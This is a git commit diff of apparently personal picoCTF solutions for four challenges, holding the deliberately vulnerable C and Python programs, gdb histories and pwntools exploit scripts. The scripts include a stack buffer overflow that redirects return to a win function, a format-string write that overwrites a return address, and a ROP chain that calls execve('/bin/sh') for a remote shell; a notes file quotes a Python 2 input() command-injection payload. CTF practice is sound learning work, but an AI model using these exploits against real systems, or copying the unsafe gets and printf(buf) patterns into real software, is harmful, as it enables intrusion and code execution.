Guessing Game 1

What's your Input
buffer overflow 2
2025-12-21 19:35:24 +01:00 · 2025-12-21 00:32:42 +01:00 · 2025-12-20 21:23:48 +01:00 · 2025-12-19 19:04:12 +01:00
18 changed files with 918 additions and 0 deletions
--- a/buffer_overflow_2/.gdb_history
+++ b/buffer_overflow_2/.gdb_history
@@ -0,0 +1,176 @@
 r
 exit
 exit
 disassemble vuln
 b *vuln+44
 c
 c
 exit
 b *vuln+44
 c
 stackf
 disassemble vuln 
 b *vuln+29
 exit
 b *vuln+29
 c
 b *vuln+29
 continue
 disassemble vuln 
 b *vuln+44
 c
 stackf
 hexdump 
 hexdump 
 hexdump help
 hexdump $sp 20
 hexdump $sp 20
 hexdump $sp 100
 hexdump $sp 120
 hexdump $sp 140
 hexdump $sp 160
 c
 c
 b *vuln+44
 c
 stackf
 disassemble win
 b *win
 c
 stackf
 disassemble win
 b *win+11
 c
 stackf
 c
 b *win+11
 c
 c
 exit
 b *win+11
 c
 stackf
 nexti
 exit
 disassemble vuln
 b *vuln+75
 c
 disassemble vuln
 b *vuln+57
 c
 nexti
 stackf
 disassemble vuln
 disassemble win 
 hexdump $ebp+0x08
 stackf
 c
 disassemble win 
 b *win+118
 c
 c
 exit
 b *win+118
 c
 b *vuln+57
 c
 stackf
 nexti
 stackf
 disassemble win
 b *win+16
 c
 stackf
 disassemble win
 stackf
 hexdump $sp 100
 hexdump $sp 200
 c
 c
 b *win+16
 c
 hexdump $sp 200
 stackf
 c
 c
 c
 exit
 c
 stackf
 disassemble win
 b *win+7
 exit
 b *win+7
 c
 stackf
 hexdump $sp 200
 c
 exit
 b *win+7
 c
 stackf
 hexdump $sp 200
 disassemble *main
 exit
 b *win+7
 c
 stackf
 hexdump $sp 200
 disassemble *win
 nexti
 disassemble *win
 nexti
 disassemble *win
 nexti
 disassemble *win
 hexdump $sp 200
 nexti
 hexdump $sp 200
 c
 c
 exit
 disassemble *win
 b *win+118
 c
 stackf
 hexdump $sp 200
 disassemble *win
 b *win+118
 c
 hexdump $sp 200
 disassemble *win
 hexdump $ebp
 b *win+118
 c
 disassemble *win
 stackf
 c
 c
 exit
 b *win+118
 c
 stackf
 disassemble win
 hexdump $ebp
 hexdump $ebp+8
 nexti
 nexti
 stackf
 b *win+118
 c
 nexti 
 nexti 
 hexdump $ebp
 hexdump $ebp+8
 hexdump $ebp+12
 c
 b *win+118
 c
 stackf
 disassemble win
 b *win+143
 c
 disassemble win
 nexti
 c
 exit
--- a/buffer_overflow_2/flag.txt
+++ b/buffer_overflow_2/flag.txt
@@ -0,0 +1 @@
 {test}
--- a/buffer_overflow_2/sol.py
+++ b/buffer_overflow_2/sol.py
@@ -0,0 +1,24 @@
 #!/usr/bin/env python
 from pwn import *
 context.terminal = "kitty"
 win_address = 0x08049296
 buffer_base = 0xfffe422c
 ret_location = 0xfffe429c
 ret_offset = ret_location - buffer_base
 ebp_offset = 112
 arg1 = 0xCAFEF00D
 arg2 = 0xF00DF00D
 conn = remote("saturn.picoctf.net", 56706)
 #conn = process("./vuln")
 #attach(conn)
 conn.recvline()
 conn.writeline(flat({ebp_offset+0x8:arg1, ebp_offset+0xc:arg2, ret_offset:win_address}, word_size=32))
 conn.recvline()
 rest = conn.recvuntil(b'}')
 log.info(f"got {rest}")
--- a/buffer_overflow_2/vuln
+++ b/buffer_overflow_2/vuln
--- a/buffer_overflow_2/vuln.c
+++ b/buffer_overflow_2/vuln.c
@@ -0,0 +1,44 @@
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <unistd.h>
 #include <sys/types.h>
 #define BUFSIZE 100
 #define FLAGSIZE 64
 void win(unsigned int arg1, unsigned int arg2) {
  char buf[FLAGSIZE];
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("%s %s", "Please create 'flag.txt' in this directory with your",
                    "own debugging flag.\n");
    exit(0);
  }
  fgets(buf,FLAGSIZE,f);
  if (arg1 != 0xCAFEF00D)
    return;
  if (arg2 != 0xF00DF00D)
    return;
  printf(buf);
 }
 void vuln(){
  char buf[BUFSIZE];
  gets(buf);
  puts(buf);
 }
 int main(int argc, char **argv){
  setvbuf(stdout, NULL, _IONBF, 0);
  gid_t gid = getegid();
  setresgid(gid, gid, gid);
  puts("Please enter your string: ");
  vuln();
  return 0;
 }
--- a/echo_valley/.gdb_history
+++ b/echo_valley/.gdb_history
@@ -0,0 +1,242 @@
 disassemble main
 disassemble echo_valley 
 b *echo_valley+218
 r
 r
 r
 r
 stackf
 AAAA.%p.%p.%p.%p.%p.%p
 r
 nexti
 r
 stackf
 nexti
 r
 stepi
 stackf
 next
 next
 next
 next
 next
 next
 next
 next
 next
 next
 next
 next
 next
 next
 nextret 
 next
 r
 stepi
 stackf
 nextret 
 nexti
 stackf
 r
 disassemble echo_valley 
 stackf
 help stackf
 stackf 8 -10
 stackf 8
 stackf 8 10
 stackf 8 -100
 stackf 16 -10
 hexdump $sp
 hexdump $sp-0x60
 hexdump $sp-0x60 100
 hexdump $sp-0x60 1000
 hexdump $sp-0x60 100
 stackf
 hexdump $sp-0x60 100
 stackf
 nextret
 r
 stackf
 hexdump $sp-0x60 200
 necti
 nexti
 stackf
 r
 stepi
 stackf
 r
 stackf
 nexti
 stackf
 r
 stackf
 stepi
 stackf
 nextret
 r
 stackf
 stepi
 stackf
 nextret
 exit
 disassemble echo_valley 
 b *echo_valley+201
 r
 nexti
 exit
 disassemble echo_valley 
 b *echo_valley+218
 r
 nexti
 stackf
 exit
 b *echo_valley+218
 r
 stackf
 exit
 b *echo_valley+218
 r
 nexti
 stackf
 exit
 b *echo_valley+218
 r
 stackf
 hexdump
 hexdump 20
 hexdump $sp 20
 hexdump $sp 100
 hexdump $sp 120
 hexdump $sp 140
 nexti
 exit
 b *echo_valley+218
 r
 nexti
 stackf
 hexdump $sp 140
 exit()
 lexit
 exit
 b *echo_valley+218
 disassemble echo_valley 
 r
 nexti
 stackg
 stackf
 hexdump $sp 140
 xit
 exit
 exit
 nexti
 nexti
 r
 exit
 stackf
 stackf
 nexti
 nextret 
 nextret 
 nextret 
 nextret 
 nextret 
 nextret 
 nextret 
 nextret 
 stackf
 nextret
 nextret
 nextret
 stackf
 exit
 exit
 exit
 disassemble echo-valley
 disassemble echo_valley 
 nextret
 nextret
 exit
 disassemble echo_valley 
 b *echo_valley+163
 nextret
 stackf
 exit
 disassemble echo_valley 
 b *echo_valley+218
 r
 help printf
 printf "\01\02"
 printf "\x01\x02"
 printf "\x61\x62"
 printf "\x41\x41"
 disassemble valloc 
 exit
 disassemble echo_valley 
 b *echo_valley+218
 stackf
 stackf help
 stackf 20
 stackf 20 -1
 stackf 20 -2
 stackf 20 1
 stackf 20 2
 stackf 20 3
 stack-explore 
 stack
 stackf
 r
 exit
 b *echo_valley+218
 exit
 b *echo_valley+218
 continue 
 stackf
 nexti
 stackf
 exit
 b *echo_valley+218
 continue 
 nexti
 stackf
 exit
 b *echo_valley+218
 continue 
 nexti
 exit
 b *echo_valley+218
 continue 
 nexti
 hexdump $sp 140
 continue 
 stackf
 hexdump $sp 140
 nexti
 stackf
 hexdump $sp 140
 exit
 b *echo_valley+218
 continue
 nexti
 continue
 nexti
 stackf
 hexdump $sp 140
 exit
 b *echo_valley+218
 continue
 hexdump $sp 140
 nexti
 hexdump $sp 140
 exit
 b *echo_valley+218
 continue 
 hexdump $sp 140
 nexti
 hexdump $sp 140
 continue 
 hexdump $sp 140
 nexti
 hexdump $sp 140
 continue
 exit
 exit
--- a/echo_valley/manual.py
+++ b/echo_valley/manual.py
@@ -0,0 +1,51 @@
 #!/usr/bin/env python
 from pwn import *
 context.terminal = "kitty"
 def write(data):
    print(f"data to send: {data}")
    return input("enter result: ").encode()
 address_leak_string = write(b"AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p")
 print(f"received {address_leak_string}")
 dot = address_leak_string.rfind(b'.')
 address_leak = int(address_leak_string[dot+1:], 16)
 print(f"return address: {hex(address_leak)}")
 dot2 = address_leak_string.rfind(b'.', 0, dot)
 stack_address_leak_after_ret = int(address_leak_string[dot2+1:dot], 16)
 stack_address_ret = stack_address_leak_after_ret - 8
 print(f"found stack address of ret pointer: {hex(stack_address_ret)}")
 address_offset = 18
 main_offset = 0x1401
 print_flag_offset = 0x1269
 address_to_return_to = address_leak - address_offset - main_offset + print_flag_offset
 print(f"jump address is: {hex(address_to_return_to)}")
 # only 2 least significant address bytes have to be rewritten
 print(f"first byte address: {p64(stack_address_ret)}")
 # produces string that writes 0<=n<=255 to byte at address
 # offset for alignment of memory address
 # here, use offset 2
 def produce_writer(n, address, offset=0, op=b"hhn"):
    if n < 0:
        log.error(f"n has to be >= 0, is {n}")
        exit()
    if n < 8:
        n_pre = n
        n_post = 8 - n_pre + offset
        return b'.'*n_pre + b"%8$" + op + b'.'*n_post + address
    else:
        return f"%{n:03}$x..".encode() + b"%8$" + op + b'.'*offset + address
 lower_byte_value = address_to_return_to%256
 upper_byte_value = (address_to_return_to>>8)%256
 print(f"lower byte value: {lower_byte_value}\nupper byte value: {upper_byte_value}")
 write_lower_byte = write(produce_writer(0, p64(stack_address_ret), offset=2))
 write_upper_byte = write(produce_writer(0, p64(stack_address_ret+1), offset=2))
 conn.interactive(term.text.bold_red(">> "))
--- a/echo_valley/sol.py
+++ b/echo_valley/sol.py
@@ -0,0 +1,63 @@
 #!/usr/bin/env python
 from pwn import *
 #conn = process("./valley")
 conn = remote("shape-facility.picoctf.net", 53287)
 conn.recvline()
 def write(data):
    conn.sendline(data)
    conn.recvuntil(b"e: ")
    return conn.recvline(keepends=False)
 address_leak_string = write(b"AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p")
 log.info(f"received {address_leak_string}")
 dot = address_leak_string.rfind(b'.')
 address_leak = int(address_leak_string[dot+1:], 16)
 log.info(f"return address: {hex(address_leak)}")
 dot2 = address_leak_string.rfind(b'.', 0, dot)
 stack_address_leak_after_ret = int(address_leak_string[dot2+1:dot], 16)
 stack_address_ret = stack_address_leak_after_ret - 8
 log.info(f"found stack address of ret pointer: {hex(stack_address_ret)}")
 address_offset = 18
 main_offset = 0x1401
 print_flag_offset = 0x1269
 address_to_return_to = address_leak - address_offset - main_offset + print_flag_offset
 log.info(f"jump address is: {hex(address_to_return_to)}")
 # only 2 least significant address bytes have to be rewritten
 log.info(f"first byte address: {p64(stack_address_ret)}")
 # produces string that writes 0<=n<=255 to byte at address
 # offset for alignment of memory address
 # here, use offset 2
 def produce_writer(n, address, offset=0, op=b"hhn"):
    if n < 0:
        log.error(f"n has to be >= 0, is {n}")
        exit()
    if n < 8:
        n_pre = n
        n_post = 8 - n_pre + offset
        return b'.'*n_pre + b"%8$" + op + b'.'*n_post + address
    else:
        return f"%{(n-3):03}x...".encode() + b"%8$" + op + b'.'*offset + address
 lower_byte_value = address_to_return_to%256
 upper_byte_value = (address_to_return_to>>8)%256
 lower_byte_writer = produce_writer(lower_byte_value, p64(stack_address_ret), offset=2)
 log.info(f"writing lower byte value to {hex(lower_byte_value)} on enter with string {lower_byte_writer}")
 write_lower_byte = conn.sendline(lower_byte_writer)
 upper_byte_writer = produce_writer(upper_byte_value, p64(stack_address_ret+1), offset=2)
 log.info(f"writing upp byte value to {hex(upper_byte_value)} on enter with string {upper_byte_writer}")
 write_upper_byte = conn.sendline(upper_byte_writer)
 conn.sendline(b"exit")
 conn.recvuntil(b"The Valley Disappears\n")
 rest = conn.recvall()
 log.info(f"got {rest}")
--- a/echo_valley/valley
+++ b/echo_valley/valley
--- a/echo_valley/valley.c
+++ b/echo_valley/valley.c
@@ -0,0 +1,49 @@
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 void print_flag() {
    char buf[32];
    FILE *file = fopen("/home/valley/flag.txt", "r");
    if (file == NULL) {
      perror("Failed to open flag file");
      exit(EXIT_FAILURE);
    }
    fgets(buf, sizeof(buf), file);
    printf("Congrats! Here is your flag: %s", buf);
    fclose(file);
    exit(EXIT_SUCCESS);
 }
 void echo_valley() {
    printf("Welcome to the Echo Valley, Try Shouting: \n");
    char buf[100];
    while(1)
    {
        fflush(stdout);
        if (fgets(buf, sizeof(buf), stdin) == NULL) {
          printf("\nEOF detected. Exiting...\n");
          exit(0);
        }
        if (strcmp(buf, "exit\n") == 0) {
            printf("The Valley Disappears\n");
            break;
        }
        printf("You heard in the distance: ");
        printf(buf);
        fflush(stdout);
    }
    fflush(stdout);
 }
 int main()
 {
    echo_valley();
    return 0;
 }
--- a/guessing_game_1/.gdb_history
+++ b/guessing_game_1/.gdb_history
@@ -0,0 +1,60 @@
 disassemble main
 disassemble increment 
 disassemble get_random 
 exit
 cyclic
 cyclic 100
 cyclic 200
 cyclic 360
 cyclic zaaa
 cyclic zaaaaa
 cyclic help
 cyclic -l bdaaaaaa
 cyclic -l aaaaaa
 cyclic -l aaaaaaaa
 cyclic -l aaaaaaab
 r
 r
 cyclic -l 0x6161616161616170
 disassemble main
 exit
 c
 c
 c
 c
 c
 c
 c
 c
 disassemble win
 b *win+49
 c
 exit
 b *win+49
 c
 stackf
 stackf help
 stackf -h
 stackf 100
 hexdump $sp 200
 nexti
 stackf
 nexti
 c
 hexdump *bss
 vmmap
 hexdump 0x6b7000
 hexdump 0x6bd000
 hexdump 7062432
 nexti
 b *win+49
 c
 nexti
 hexdump 7062432
 c
 nexti
 c
 b *win+49
 c
 c
 nexti
--- a/guessing_game_1/Makefile.share
+++ b/guessing_game_1/Makefile.share
@@ -0,0 +1,5 @@
 all:
 	gcc -m64 -fno-stack-protector -O0 -no-pie -static -o vuln vuln.c
 clean:
 	rm vuln
--- a/guessing_game_1/get_random_numbers.py
+++ b/guessing_game_1/get_random_numbers.py
@@ -0,0 +1,28 @@
 #!/usr/bin/env python
 from pwn import *
 n = 6
 values = []
 p = log.progress(f"bruteforcing {n} random numbers")
 while len(values) < n:
    for i in range(100):
        with context.quiet:
            conn = process("./vuln")
        conn.recvline()
        for v in values:
            conn.recvuntil(b"guess?")
            conn.sendline(str(v).encode())
            conn.sendline(b"0")
        p.status(f"i = {i:03}, {values}...")
        conn.recvuntil(b"guess?")
        conn.sendline(str(i+1).encode())
        conn.recvline()
        result = conn.recvline()
        with context.quiet:
            conn.close()
        if b"win" in result:
            values.append(i+1)
            break
 p.success(f"values are {values}")
--- a/guessing_game_1/sol.py
+++ b/guessing_game_1/sol.py
@@ -0,0 +1,58 @@
 #!/usr/bin/env python
 from pwn import *
 # https://cyb3rwhitesnake.medium.com/picoctf-guessing-game-1-pwn-bdc1c87016f9
 context.terminal = "kitty"
 numbers = [84, 87, 78, 16, 94, 36] # -> brute-forcing script
 elf = ELF("./vuln")
 rop = ROP(elf)
 pop_rdi = rop.rdi.address
 pop_rsi = rop.rsi.address
 pop_rdx = rop.rdx.address
 pop_rax = rop.rax.address
 syscall = rop.syscall.address
 bss = elf.bss()
 read = elf.functions['read'].address
 main = elf.functions['main'].address
 ret_offset = 120
 conn = remote("shape-facility.picoctf.net", 50780)
 #conn = process("./vuln")
 #attach(conn)
 conn.recvuntil(b"guess?")
 conn.sendline(str(numbers[0]).encode())
 conn.recvuntil(b"Name?")
 # call read: read(int fd -> rdi, void buf[count] -> rsi, size_t count -> rdx)
 # read(stdin/0, bss, 12)
 log.info(f"sending read payload")
 payload = cyclic(ret_offset, n=8)
 payload += p64(pop_rdi) + p64(0)
 payload += p64(pop_rsi) + p64(bss)
 payload += p64(pop_rdx) + p64(12)
 payload += p64(read)
 payload += p64(main)
 conn.sendline(payload)
 conn.sendline(b"/bin/sh\x00")
 conn.recvuntil(b"guess?")
 conn.sendline(str(numbers[1]).encode())
 conn.recvuntil(b"Name?")
 # call /bin/sh: sys_execve(59), rdi: char *filename, rsi: char *argv, rdx: char *envp
 # sys_execve(bss, NULL/0, NULL/0)
 log.info(f"calling execve")
 payload = cyclic(ret_offset, n=8)
 payload += p64(pop_rax) + p64(59)
 payload += p64(pop_rdi) + p64(bss)
 payload += p64(pop_rsi) + p64(0)
 payload += p64(pop_rdx) + p64(0)
 payload += p64(syscall)
 conn.sendline(payload)
 conn.recvline()
 conn.interactive()
--- a/guessing_game_1/vuln
+++ b/guessing_game_1/vuln
--- a/guessing_game_1/vuln.c
+++ b/guessing_game_1/vuln.c
@@ -0,0 +1,67 @@
 #include <stdio.h>
 #include <stdlib.h>
 #include <unistd.h>
 #include <sys/types.h>
 #include <sys/stat.h>
 #define BUFSIZE 100
 long increment(long in) {
 	return in + 1;
 }
 long get_random() {
 	return rand() % BUFSIZE;
 }
 int do_stuff() {
 	long ans = get_random();
 	ans = increment(ans);
 	int res = 0;
 	printf("What number would you like to guess?\n");
 	char guess[BUFSIZE];
 	fgets(guess, BUFSIZE, stdin);
 	long g = atol(guess);
 	if (!g) {
 		printf("That's not a valid number!\n");
 	} else {
 		if (g == ans) {
 			printf("Congrats! You win! Your prize is this print statement!\n\n");
 			res = 1;
 		} else {
 			printf("Nope!\n\n");
 		}
 	}
 	return res;
 }
 void win() {
 	char winner[BUFSIZE];
 	printf("New winner!\nName? ");
 	fgets(winner, 360, stdin);
 	printf("Congrats %s\n\n", winner);
 }
 int main(int argc, char **argv){
 	setvbuf(stdout, NULL, _IONBF, 0);
 	// Set the gid to the effective gid
 	// this prevents /bin/sh from dropping the privileges
 	gid_t gid = getegid();
 	setresgid(gid, gid, gid);
 	int res;
 	printf("Welcome to my guessing game!\n\n");
 	while (1) {
 		res = do_stuff();
 		if (res) {
 			win();
 		}
 	}
 	return 0;
 }
--- a/whats_your_input/in.py
+++ b/whats_your_input/in.py
@@ -0,0 +1,37 @@
 #!/usr/bin/python2.7 -u
 import random
 cities = open("./city_names.txt").readlines()
 city = random.choice(cities).rstrip()
 year = 2018
 print("What's your favorite number?")
 res = None
 while not res:
    try:
        res = input("Number? ")
        print("You said: {}".format(res))
    except:
        res = None
 if res != year:
    print("Okay...")
 else:
    print("I agree!")
 print("What's the best city to visit?")
 res = None
 while not res:
    try:
        res = input("City? ")
        print("You said: {}".format(res))
    except:
        res = None
 if res == city:
    print("I agree!")
    flag = open("./flag").read()
    print(flag)
 else:
    print("Thanks for your input!")
--- a/whats_your_input/sol.txt
+++ b/whats_your_input/sol.txt
@@ -0,0 +1,13 @@
 https://github.com/3ls3if/Cybersecurity-Notes/blob/main/real-world-and-and-ctf/scripts-and-systems/python2-input-vulnerability.md
 Python 2 input vulnerability is a security flaw that arises due to the usage of the input() function in Python 2. Unlike its Python 3 counterpart, the input() function in Python 2 evaluates the input as Python code rather than treating it as a simple string. This behavior can lead to serious security vulnerabilities if the input is not properly sanitized or validated.
 Consider a scenario where a Python 2 application uses the input() function to accept user input for executing system commands. If an attacker enters malicious code instead of expected input, the interpreter will execute it without any restrictions, potentially allowing the attacker to run arbitrary commands on the system.
 # Python 2 vulnerable code
 e = input("Enter your name: ")
 print e
 # payload
 '__import__("os").system("uname -a")'
Author	SHA1	Message	Date
THEON-1	e23720a073	Guessing Game 1	2025-12-21 19:35:24 +01:00
THEON-1	e2706a9bc4	What's your Input	2025-12-21 00:32:42 +01:00
THEON-1	13815ed351	buffer overflow 2	2025-12-20 21:23:48 +01:00
THEON-1	2359a500a2	Echo Valley	2025-12-19 19:04:12 +01:00